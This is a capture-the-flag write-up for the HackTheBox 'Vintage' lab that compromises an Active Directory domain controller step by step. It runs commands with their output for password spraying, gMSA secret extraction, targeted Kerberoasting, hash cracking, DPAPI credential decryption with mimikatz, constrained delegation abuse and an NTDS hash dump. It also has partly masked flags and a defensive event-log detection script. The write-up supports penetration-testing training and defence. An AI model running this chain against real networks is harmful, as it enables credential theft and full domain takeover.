# HTB - Vintage

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FpGbnT0d7gy2foNyFAyMt%2Fimage.png?alt=media&#x26;token=804708ed-b1a4-48dd-8d03-70c58ac56d38" alt=""><figcaption></figcaption></figure>

## Enumeration

***

> As is common in real life Windows pentests, you will start the Vintage box with credentials for the following account: P.Rosa / Rosaisbest123

**Nmap Scan**

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/all-ports

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49667/tcp open  unknown
49670/tcp open  unknown
49681/tcp open  unknown
49689/tcp open  unknown
49708/tcp open  unknown

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $ nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985 -sCV 10.129.124.148 -oN Nmap/script-scan

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Active Directory LDAP (Domain: vintage.htb)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Active Directory LDAP (Domain: vintage.htb)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
```

**Summary**

* Open ports: 53,88,135,139,389,445,464,593,636,3268,3269,5985
* Services: DNS - Kerberos - RPC - LDAP - LDAPS - SMB - WinRM
* Important notes: Domain: vintage.htb

**hosts file**

Update the hosts file to avoid encountering any issues when authenticating to the domain

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $sudo sh -c "echo  '10.129.124.148 dc01 vintage.htb dc01.vintage.htb' >> /etc/hosts"

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $tail -n1 /etc/hosts
10.129.124.148 dc01 vintage.htb dc01.vintage.htb
```

**DNS Enumeration**

Zone transfer failed (note that the commands below misspell the domain as `vintange.htb`, so the result against the correct name is not shown)

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $dig axfr @$ip vintange.htb

; <<>> DiG 9.18.19-1~deb12u1-Debian <<>> axfr @10.129.124.148 vintange.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $dig axfr @$ip dc01.vintange.htb

; <<>> DiG 9.18.19-1~deb12u1-Debian <<>> axfr @10.129.124.148 dc01.vintange.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.
```

**RPC & SMB Enumeration**

Every time I connect to `rpc` with invalid credentials, it gives me `Access_denied`, but this weird error message is unique this time:

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $rpcclient -U "%" $ip
Cannot connect to server.  Error was NT_STATUS_NOT_SUPPORTED

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $rpcclient -U "%" $ip -c enumdomusers
Cannot connect to server.  Error was NT_STATUS_NOT_SUPPORTED
```

The same thing with `SMB` using `netexec`

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FiSXtboy7JWskLcUeoVp5%2FPasted%20image%2020241130211804.png?alt=media&#x26;token=7ecdc24b-8fdd-4917-bbab-20ae45909e70" alt=""><figcaption></figcaption></figure>

**Kerberos & LDAP Enumeration**

The `NT_STATUS_NOT_SUPPORTED` error means `NTLM` authentication is disabled on the DC, so I have to use `Kerberos` authentication instead.

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc ldap dc01 -u P.Rosa -p Rosaisbest123 -d vintage.htb -k  --admin-count

LDAP        dc01   389    dc01.vintage.htb [+] vintage.htb\P.Rosa:Rosaisbest123 
LDAP        dc01            389    dc01.vintage.htb Administrator
LDAP        dc01            389    dc01.vintage.htb Administrators
LDAP        dc01            389    dc01.vintage.htb Print Operators
LDAP        dc01            389    dc01.vintage.htb Backup Operators
LDAP        dc01            389    dc01.vintage.htb Replicator
LDAP        dc01            389    dc01.vintage.htb L.Bianchi_adm
```

I will note `L.Bianchi_adm` as a high-value target in my notes, then continue enumerating.

Getting all users in the domain and their description field

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FnXYLhs8Jz33G7fDgYYrM%2FPasted%20image%2020241130214750.png?alt=media&#x26;token=5b4887e2-d3f2-44dc-a522-c9394cf1ba88" alt=""><figcaption></figcaption></figure>

Checking for `PKI`, `LDAP signing` and `Machine Account Quota`

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc ldap dc01 -u P.Rosa -p Rosaisbest123 -d vintage.htb -k -M adcs -M ldap-checker -M maq

LDAP        dc01            389    dc01.vintage.htb [+] vintage.htb\P.Rosa:Rosaisbest123 
ADCS        dc01            389    dc01.vintage.htb [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'

LDAP-CHE... dc01            389    dc01.vintage.htb [-] [Errno -2] Name or service not known
LDAP-CHE... dc01            389    dc01.vintage.htb LDAP Signing NOT Enforced!

MAQ         dc01            389    dc01.vintage.htb [*] Getting the MachineAccountQuota
MAQ         dc01            389    dc01.vintage.htb MachineAccountQuota: 0
```

Password reuse check (spraying `P.Rosa`'s password against the other users) failed

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc ldap dc01 -u users.list -p Rosaisbest123 -d vintage.htb -k --continue-on-success
LDAP        dc01            389    dc01.vintage.htb [*]  x64 (name:dc01.vintage.htb) (domain:vintage.htb) (signing:True) (SMBv1:False)
LDAP        dc01            389    dc01.vintage.htb [-] vintage.htb\L.Bianchi_adm:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP        dc01            389    dc01.vintage.htb [-] vintage.htb\C.Neri_adm:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP        dc01            389    dc01.vintage.htb [-] vintage.htb\svc_ark:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP        dc01            389    dc01.vintage.htb [-] vintage.htb\svc_ldap:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP        dc01            389    dc01.vintage.htb [-] vintage.htb\svc_sql:Rosaisbest123 KDC_ERR_CLIENT_REVOKED
LDAP        dc01            389    dc01.vintage.htb [+] vintage.htb\P.Rosa:Rosaisbest123 
LDAP        dc01            389    dc01.vintage.htb [-] vintage.htb\C.Neri:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP        dc01            389    dc01.vintage.htb [-] vintage.htb\G.Viola:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP        dc01            389    dc01.vintage.htb [-] vintage.htb\L.Bianchi:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP        dc01            389    dc01.vintage.htb [-] vintage.htb\R.Verdi:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP        dc01            389    dc01.vintage.htb [-] vintage.htb\M.Rossi:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
```

## Foothold

***

With a domain user credential, I can use `bloodhound.py` to dump LDAP data for further enumeration, then ingest the zip file into `BloodHound CE`

`FS01` is a member of `PRE-WINDOWS 2000 COMPATIBLE ACCESS@VINTAGE.HTB`

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FQeYNnN50jfSUVJhaWfk2%2FPasted%20image%2020241201161854.png?alt=media&#x26;token=7e8c8c26-d49b-432c-a65e-43b7b04696cc" alt=""><figcaption></figcaption></figure>

Attack explanation ([Pre-Windows 2000 computers | The Hacker Recipes](https://www.thehacker.recipes/ad/movement/builtins/pre-windows-2000-computers))\
Reference: [TrustedSec | Diving into Pre-Created Computer Accounts](https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts)

> From the post, a computer account assigned the `pre-Windows 2000` attribute has its lowercase name as its password

Confirming it with `netexec`

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc ldap 10.129.232.23 -u 'fs01$' -p fs01 -k

LDAP   10.129.232.23   389    dc01.vintage.htb [+] vintage.htb\fs01$:fs01 
```

With the `fs01$` computer account, I can extract the `GMSA` secret hash thanks to the `ReadGMSAPassword` privilege

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FveQ1xGCRkGHhao6dWyTk%2FPasted%20image%2020241130221424.png?alt=media&#x26;token=fc34b8c4-ae67-4640-b4a7-5bd00bd71e3e" alt=""><figcaption></figcaption></figure>

First, get a Kerberos ticket for `fs01$`, then point the `KRB5CCNAME` variable at it to extract the `GMSA` secrets with `bloodyAD`

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $kinit 'fs01$'
Password for fs01$@VINTAGE.HTB: fs01

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: fs01$@VINTAGE.HTB

Valid starting       Expires              Service principal
12/01/2024 09:23:42  12/01/2024 19:23:42  krbtgt/VINTAGE.HTB@VINTAGE.HTB
        renew until 12/02/2024 09:23:40

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $KRB5CCNAME=/tmp/krb5cc_1000 bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip dc01 -k get object 'GMSA01$' --attr msDS-ManagedPassword

distinguishedName: CN=gMSA01,CN=Managed Service Accounts,DC=vintage,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:54311f0ed05b807a7axxxxxxxxxxxxxxx
msDS-ManagedPassword.B64ENCODED: c6qwf6x+EXiEYKGhCu/wTBcnxxxxxxxxxxxxxxxxxxxxxxCaIhn2MobwBxF4Q6fd3W5P13wvh2Jf/Wp2WHsjIEjkbF0duDHoCBAK31Q+BoQg0eUHbsRcksNrkLcPtkZ5eUhK+TzgpXeFKt0VCOWFkAOStKE1H5PDfUGoC2xuP+Tceg7iV0IcMBaR8Db3UgqaqP2LLRiimuL6ZO4xl6sSRKrdRQEQOR7L9fFw9JW7myCsbj2TPxFc5WaMQtWi456OvwBQn4jhdty5tSjv2uMlcq+sQMz60voxH6sClACPGKJMCr2FNVJP6dd1GTdvh6n5Dbh/yhHCAF8UzYeGXv2Nx3Dw==
```

Get a Kerberos ticket for the `GMSA01$` account.

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $impacket-getTGT vintage.htb/'gmsa01$'@dc01 -hashes :54311f0ed05b807a7aaf5943b595f224

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Saving ticket in gmsa01$@dc01.ccache
```

`GMSA01$` can add itself or any user to the `Service Managers` group, so I will add `P.Rosa` to that group because I have his password, and it's easy to move when you have a password :))

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FgEc9q2BGhfsNK0hbKw1o%2FPasted%20image%2020241130221450.png?alt=media&#x26;token=c049ed2e-1b7d-433c-8145-8eb07ac8e15b" alt=""><figcaption></figcaption></figure>

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $KRB5CCNAME=`pwd`/'gmsa01$@dc01.ccache' bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip dc01 -k add groupMember "CN=SERVICEMANAGERS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB" P.Rosa

[+] P.Rosa added to CN=SERVICEMANAGERS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB
```

Membership in the `Service Managers` group grants me the ability to change the password of three service users or assign a fake SPN to them

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2F5NsI3hjAehPkJj4MzsBM%2FPasted%20image%2020241130215052.png?alt=media&#x26;token=eada984c-5409-422d-93e7-bdf5320bb8b2" alt=""><figcaption></figcaption></figure>

Trying to perform targeted Kerberoasting against the `svc_sql` account; it must be enabled first, because I can't request a `Service Ticket (ST)` for a disabled account

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FOq30ioUP5Qzc6LBXAl3l%2FPasted%20image%2020241201172130.png?alt=media&#x26;token=5b374fac-81a9-46f4-bb49-3f6682ddd759" alt=""><figcaption></figcaption></figure>

Using `PowerView.py`, I can assign an SPN to the account and enable it

```bash
(LDAP)-[dc01.vintage.htb]-[VINTAGE\P.Rosa]
PV > Set-DomainObject -Identity svc_sql -Set serviceprincipalname='service/dc01.vintage.htb'

[2024-12-01 10:13:49] [Set-DomainObject] Success! modified attribute serviceprincipalname for CN=svc_sql,OU=Pre-Migration,DC=vintage,DC=htb

(LDAP)-[dc01.vintage.htb]-[VINTAGE\P.Rosa]
PV > Set-DomainObject -Identity svc_sql -Set userAccountControl=512             

[2024-12-01 10:18:27] [Set-DomainObject] Success! modified attribute useraccountcontrol for CN=svc_sql,OU=Pre-Migration,DC=vintage,DC=htb
```

Perform a Kerberoasting attack

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc ldap dc01 -u p.rosa -p Rosaisbest123 -k --kerberoasting kerberos.hash

LDAP        dc01            389    dc01.vintage.htb [+] vintage.htb\p.rosa:Rosaisbest123 
LDAP        dc01            389    dc01.vintage.htb Bypassing disabled account krbtgt 
LDAP        dc01            389    dc01.vintage.htb [*] Total of records returned 1
LDAP        dc01            389    dc01.vintage.htb sAMAccountName: svc_sql memberOf: CN=ServiceAccounts,OU=Pre-Migration,DC=vintage,DC=htb pwdLastSet: 2024-12-01 10:12:04.583550 lastLogon:<never>
LDAP        dc01            389    dc01.vintage.htb $krb5tgs$23$*svc_sql$VINTAGE.HTB$vintage.htb/svc_sql*$blob...
```

Crack the hash

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $hashcat -m 13100 kerberos.hash /usr/share/wordlists/rockyou.txt

$krb5tgs$23$*svc_sql$VINTAGE.HTB$vintage.htb/svc_sql*$5c8b7f808a8cf1a4eb8cdc495b8f71b9$13310d68a29e5f44f74d55c066d19a6d3f187906b54c866fd860784de403813e9a8772ec270e8734b4d89d04dc51a4e569c92beac67729b043471fe387c8659a945e9893e3ebafe0b97e6e8ee912354186321c1029a5b9aca893aa5a6e2197493250e38b1ef7a0cc554b70dc16da09d29207172e7ef3715a41c5f36ce3d5bc6801a5ff7a382c0217e43c2f8daaf84e742e17a..snip..5:Zerxxxxxxx

Session..........: hashcat
Status...........: Cracked
```

Spraying the password reveals that `C.Neri` has the same one

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FOJREFGqiqW8WgZ9IBtxD%2FPasted%20image%2020250412001453.png?alt=media&#x26;token=9f788bc8-17d9-4156-8dc6-40f1c6ea74b0" alt=""><figcaption></figcaption></figure>

Since `C.Neri` is in `Remote Management Users`, I will access the machine with `evil-winrm`, but first I need a `Kerberos` ticket for him.

> To perform kerberos authentication from Linux, you must configure `/etc/krb5.conf` first

```conf
[libdefaults]
    default_realm = VINTAGE.HTB

[realms]
    VINTAGE.HTB = {
        kdc = dc01.vintage.htb
        admin_server = dc01.vintage.htb
        default_domain = vintage.htb
    }

[domain_realm]
    .vintage.htb = VINTAGE.HTB
    vintage.htb = VINTAGE.HTB
```

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $kinit C.Neri
Password for C.Neri@VINTAGE.HTB: 

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: C.Neri@VINTAGE.HTB

Valid starting       Expires              Service principal
12/01/2024 10:27:07  12/01/2024 20:27:07  krbtgt/VINTAGE.HTB@VINTAGE.HTB
        renew until 12/02/2024 10:27:02
```

Access the machine via `winRM` using Kerberos authentication

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $KRB5CCNAME=/tmp/krb5cc_1000 evil-winrm -i dc01 -r vintage.htb

*Evil-WinRM* PS C:\Users\C.Neri\Desktop> type user.txt
35cb0ccde18da32e0366xxxxxxxxxxxxxxxxx
```

> User Flag: 35cb0ccde18da32e0366xxxxxxxxxxxxxxxxx

## Lateral Movement

***

Inside `C.Neri`'s profile folder, there are DPAPI-encrypted credentials

> DPAPI stands for Data Protection API, Microsoft's built-in encryption mechanism. Data it protects can be decrypted with the master key of the user who encrypted it, and that master key is itself protected with the user's password.

* Usual location of DPAPI credential blobs:
  * `%USERPROFILE%\AppData\Roaming\Microsoft\Credentials`
  * `%USERPROFILE%\AppData\Local\Microsoft\Credentials`
* Master key location:
  * `%USERPROFILE%\AppData\Roaming\Microsoft\Protect\<SID>\`

```powershell
JokerShell C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials> ls -Force

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-          6/7/2024   5:08 PM            430 C4BB96844A5C9DD45D5B6A9859252BA6
```

We can base64-encode this encrypted credential and transfer it to our Windows VM along with the master keys, then decrypt it locally.

After doing so, we can use `mimikatz.exe`: `dpapi::masterkey` first to recover the master key, then `dpapi::cred` to decrypt the credential with the obtained master key.

```powershell
dpapi::masterkey /in:C:\Users\Dark_Man\Downloads\4dbf04d8-529b-4b4c-b4ae-8e875e4fe847 /sid:S-1-5-21-4024337825-2033394866-2055507597-1115 /password:Zerxxxxxxx /protected

dpapi::masterkey /in:C:\Users\Dark_Man\Downloads\99cf41a3-a552-4cf7-a8d7-aca2d6f7339b /sid:S-1-5-21-4024337825-2033394866-2055507597-1115 /password:Zerxxxxxxx /protected

[masterkey] with password: Zerxxxxxxx (protected user)
  key : 55d51b40d9aa74e8cdc44a6d24a25xxxxxxxxxxxxxxxxxxxxxxxxxx048b60a652b5330ff2635a511210209b28f81c3efe16b5aee3d84b5a1be3477a62e25989f
  sha1: 637b40612daf4b1bd99785833479898aeb6d9739

dpapi::cred /in:C:\Users\Dark_Man\Downloads\C4BB96844A5C9DD45D5B6A9859252BA6 /masterkey:55d51b40d9aa74e8cdc44a6d24a25xxxxxxxxxxxxxxxxxxxxxxxxxx048b60a652b5330ff2635a511210209b28f81c3efe16b5aee3d84b5a1be3477a62e25989f

Decrypting Credential:
 * masterkey     : 55d51b40d9aa74e8cdc44a6d24a25xxxxxxxxxxxxxxxxxxxxxxxxxx048b60a652b5330ff2635a511210209b28f81c3efe16b5aee3d84b5a1be3477a62e25989f
**CREDENTIAL**
  credFlags      : 00000030 - 48
  credSize       : 000000da - 218
  credUnk0       : 00000000 - 0

  Type           : 00000001 - 1 - generic
  Flags          : 00000000 - 0
  LastWritten    : 6/7/2024 3:08:23 PM
  unkFlagsOrSize : 00000030 - 48
  Persist        : 00000003 - 3 - enterprise
  AttributeCount : 00000000 - 0
  unk0           : 00000000 - 0
  unk1           : 00000000 - 0
  TargetName     : LegacyGeneric:target=admin_acc
  UnkData        : (null)
  Comment        : (null)
  TargetAlias    : (null)
  UserName       : vintage\c.neri_adm
  CredentialBlob : Uncr4ckxxxxxxxxxxxd0312
  Attributes     : 0
```

## Privilege Escalation

***

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FR9ecT02WCWMsbdVRpJgG%2FPasted%20image%2020241130215240.png?alt=media&#x26;token=12a62b52-58e9-416f-8bcc-3daa5a4f7062" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FPQwgCg58Sl23JDnbAh48%2FPasted%20image%2020241201182841.png?alt=media&#x26;token=7eb20523-8afa-4671-82cd-4744d95619ef" alt=""><figcaption></figcaption></figure>

* Attack explanation:
  1. With `GenericWrite` on `DELEGATEDADMINS`, I can add any user to this group
  2. With `DELEGATEDADMINS` privileges, I can perform `Constrained Delegation` and request a ticket for `CIFS`
  3. With this ticket, I can dump `NTDS.DIT` database with `secretdump.py`

> There is a script running on the box that resets any change made by players, so I will repeat the earlier steps here to make things fast.

Adding `P.Rosa` to the `SERVICEMANAGERS` group (previous step)

```bash
KRB5CCNAME=`pwd`/'gmsa01$@dc01.ccache' bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip dc01 -k add groupMember "CN=SERVICEMANAGERS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB" P.Rosa
```

Set an SPN on `svc_sql` with the proper `Service/FQDN` syntax, and enable the account if it has been disabled again

Via `PowerView.py`:

```bash
Set-DomainObject -Identity svc_sql -Set userAccountControl=512
Set-DomainObject -Identity svc_sql -Set serviceprincipalname='MSSQLSvc/dc01.vintage.htb'
```

or with `bloodyAD`:

```bash
KRB5CCNAME=`pwd`/p.rosa.ccache bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip dc01 -k set object 'SVC_SQL' servicePrincipalName -v 'MSSQLSvc/dc01.vintage.htb'
```

Abuse `GenericWrite` privileges

```bash
KRB5CCNAME=`pwd`/c.neri_adm.ccache bloodyAD -k --host dc01.vintage.htb --dc-ip dc01 -d 'VINTAGE.HTB' add groupMember 'DELEGATEDADMINS' 'svc_sql'
```

Perform the `Constrained Delegation` attack

```bash
getST.py -spn 'cifs/dc01.vintage.htb' -impersonate 'dc01$' 'vintage.htb/svc_sql':'Zerxxxxxxx' -k
```

Export the ticket to `KRB5CCNAME` and dump `ntds` using `netexec`

> Note: I will use `L.BIANCHI_ADM` DA user instead of normal Administrator user.

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc smb dc01 -d vintage.htb -k --use-kcache --ntds --user L.BIANCHI_ADM                                          
SMB      dc01    445    dc01     [+] vintage.htb\dc01$ from ccache
SMB      dc01    445    dc01             L.Bianchi_adm:1141:aad3b435b51404eeaad3b435b51404ee:8e83e02f54e85de52xxxxxxxxxxxx4:::

impacket-getTGT vintage.htb/l.bianchi_adm@dc01 -hashes :8e83e02f54e85dexxxxxxxxxxxxx

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc smb dc01 -k --use-kcache -d vintage.htb

SMB   dc01    445    dc01     [+] vintage.htb\l.bianchi_adm from ccache (Pwn3d!)
```
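The chain on this box leaves a distinctive trail in the DC Security log: a member added to `SERVICEMANAGERS` or `DELEGATEDADMINS` (4728), a `servicePrincipalName` write on `svc_sql` (5136), the account being enabled (4722) and, minutes later, an RC4 service-ticket request for it (4769 with encryption type `0x17`, the `$krb5tgs$23$` seen in the hash above). The correlation below is an added example, not part of the original writeup, covering the SPN/enable/Kerberoast steps from the Foothold section and the group additions in this section; it runs over constructed events whose field names follow the Windows EventData names, with times taken from the writeup and a made-up client address.

```python
from datetime import datetime, timedelta

# Groups whose membership changes grant the paths abused on this box (the BloodHound edges above).
SENSITIVE_GROUPS = {"SERVICEMANAGERS", "DELEGATEDADMINS"}
# An SPN write followed by an RC4 TGS request for the same account inside this window = targeted Kerberoast.
WINDOW = timedelta(minutes=30)

# Constructed sample events (not real DC logs); event ids and field names follow Windows Security
# EventData, the times mirror the writeup, the 10.10.14.5 client address is made up.
EVENTS = [
    {"time": "2024-12-01T10:05:00", "id": 4728, "SubjectUserName": "GMSA01$",
     "MemberName": "CN=P.Rosa,OU=Pre-Migration,DC=vintage,DC=htb", "TargetUserName": "ServiceManagers"},
    {"time": "2024-12-01T10:13:49", "id": 5136, "SubjectUserName": "P.Rosa",
     "ObjectDN": "CN=svc_sql,OU=Pre-Migration,DC=vintage,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName", "AttributeValue": "service/dc01.vintage.htb"},
    {"time": "2024-12-01T10:18:27", "id": 4722, "SubjectUserName": "P.Rosa", "TargetUserName": "svc_sql"},
    {"time": "2024-12-01T10:20:10", "id": 4769, "TargetUserName": "P.Rosa@VINTAGE.HTB",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5"},
    {"time": "2024-12-01T11:02:00", "id": 4769, "TargetUserName": "C.Neri@VINTAGE.HTB",
     "ServiceName": "DC01$", "TicketEncryptionType": "0x12", "IpAddress": "10.10.14.5"},  # benign AES ticket
    {"time": "2024-12-01T18:30:00", "id": 4728, "SubjectUserName": "C.Neri_adm",
     "MemberName": "CN=svc_sql,OU=Pre-Migration,DC=vintage,DC=htb", "TargetUserName": "DelegatedAdmins"},
]


def analyse(events):
    """Return (rule, actor, detail) findings in time order; input events may be unordered."""
    spn_written = {}        # account (lowercase) -> time of its last servicePrincipalName write
    findings = []
    for e in sorted(events, key=lambda ev: ev["time"]):
        t = datetime.fromisoformat(e["time"])
        if e["id"] == 4728 and e["TargetUserName"].upper() in SENSITIVE_GROUPS:
            findings.append(("sensitive_group_add", e["SubjectUserName"],
                             "%s -> %s" % (e["MemberName"], e["TargetUserName"])))
        elif e["id"] == 5136 and e["AttributeLDAPDisplayName"].lower() == "serviceprincipalname":
            acct = e["ObjectDN"].split(",")[0].split("=", 1)[1]      # CN=svc_sql,... -> svc_sql
            spn_written[acct.lower()] = t
            findings.append(("spn_written", e["SubjectUserName"], "%s: %s" % (acct, e["AttributeValue"])))
        elif e["id"] == 4722:
            findings.append(("account_enabled", e["SubjectUserName"], e["TargetUserName"]))
        elif e["id"] == 4769 and e["TicketEncryptionType"].lower() == "0x17":
            svc = e["ServiceName"].lower()
            if svc == "krbtgt" or svc.endswith("$"):
                continue                      # TGT renewals and machine accounts are not user SPNs
            recent = svc in spn_written and t - spn_written[svc] <= WINDOW
            rule = "targeted_kerberoast" if recent else "rc4_service_ticket"
            findings.append((rule, e["TargetUserName"], "%s from %s" % (e["ServiceName"], e["IpAddress"])))
    return findings


if __name__ == "__main__":
    for rule, actor, detail in analyse(EVENTS):
        print("%-22s %-20s %s" % (rule, actor, detail))
```

Each rule alone is noisy on a real domain; the value is in the sequence, which is why the SPN write time is kept and matched against the later 4769.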

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $evil-winrm -i dc01 -r vintage.htb

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
a35039cb0106fdd70bcxxxxxxxxxxxxxx
```

> Root Flag: a35039cb0106fdd70bcxxxxxxxxxxxxxx
